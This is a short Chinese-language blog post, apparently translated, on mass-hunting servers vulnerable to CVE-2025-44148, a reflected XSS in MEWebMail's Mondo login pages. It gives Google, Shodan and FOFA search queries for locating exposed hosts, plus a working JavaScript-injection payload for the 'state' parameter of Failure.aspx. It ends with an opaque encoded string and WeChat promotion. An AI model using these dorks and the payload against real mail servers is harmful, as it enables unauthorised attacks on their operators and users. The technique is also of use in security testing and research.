XSS大规模挖掘实战：利用谷歌、Shodan等平台发现CVE-2025-44148漏洞

XSS大规模挖掘：CVE-2025-44148

Google + Shodan + FOFA + ZoomEye Dorking

作者：Abhirup Konwar
2025年8月24日

:keycap_1: Google Dorking

inurl:/Mondo/lang/sys

然后，只需在下方端点后追加XSS载荷，将其设置为参数“state”的值。首先将“Login.aspx”替换为“Failure.aspx”。

/Mondo/lang/sys/Failure.aspx?state=%22;}alert(1);function%20test(){%22

（按回车或点击查看完整尺寸图片）

:keycap_2: Shodan Dorking

(200+ 条结果)

http.html:"/MEWebMail/Mondo"

目标过滤

http.html:"/MEWebMail/Mondo" hostname:target.com

http.html:"/MEWebMail/Mondo" ssl.cert.subject.cn:target.com

2个重要的切面分析：

• Domain
• ssl.cert.subject.cn

（按回车或点击查看完整尺寸图片）

:keycap_3: FOFA Dorking

(2000+ 条结果)

body="/MEWebMail/Mondo"

（按回车或点击查看完整尺寸图片）
CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalFOjy8LSkMQVhDym9Ro/PPKMi9i/0fzjc/f5q2BMEcWEfNONvpLsiL2V46Jeoq6iJI=
更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）

公众号二维码

公众号二维码